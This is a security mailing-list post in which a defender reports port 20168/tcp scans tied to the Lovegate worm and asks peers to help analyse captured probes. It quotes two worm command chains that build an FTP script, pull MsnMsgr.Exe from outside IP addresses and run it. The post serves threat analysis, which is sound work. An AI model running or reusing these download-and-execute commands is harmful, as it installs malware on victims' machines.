New Worm or Worm Variant?

[Charles Hamby <fixer () gci net>]

I've been seeing a jump in 20168/tcp scans over the past week or so.  This port is commonly associated with the 
Lovegate worm.  I recently set up a port listener using Netcat to capture 
any output from probes against a couple of my systems.  Shown below are the results:

echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & 
echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe

echo open 211.26.132.172 >> wxtu.dll & echo USER noxe >> wxtu.dll & echo noxe >> wxtu.dll & echo binary >> wxtu.dll & 
echo get MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & del wxtu.dll & start MsnMsgr.Exe

At first glance it looks like some sort of non-interactive FTP session to download an exploit (MsnMsgr.Exe), but 
Googling for wxtu.dll came up empty (so this could be anything from a real .dll to a renamed executable in my mind).  A 
couple of questions for the world at large:

1) Has anyone run across anything like this before?  This looks like something automated to me.  Worm script, perhaps.  
The IP I set up the port listener on had roughly 20+ probes on 20168/tcp from noon yesterday to 7am this morning.

2) Any theories on wxtu.dll?  Since I can't get a hold of the malware to analyze it, I'm really guessing at this point. 
 MsnMsgr.Exe seems to be the exploit itself, it it appears to be using something like FTPCOM to do a non-interactive 
FTP session, but wxtu.dll could be anything from a real .dll file to a renamed executable.  Ideas?

-cdh



---------------------------------------------------------------------------
----------------------------------------------------------------------------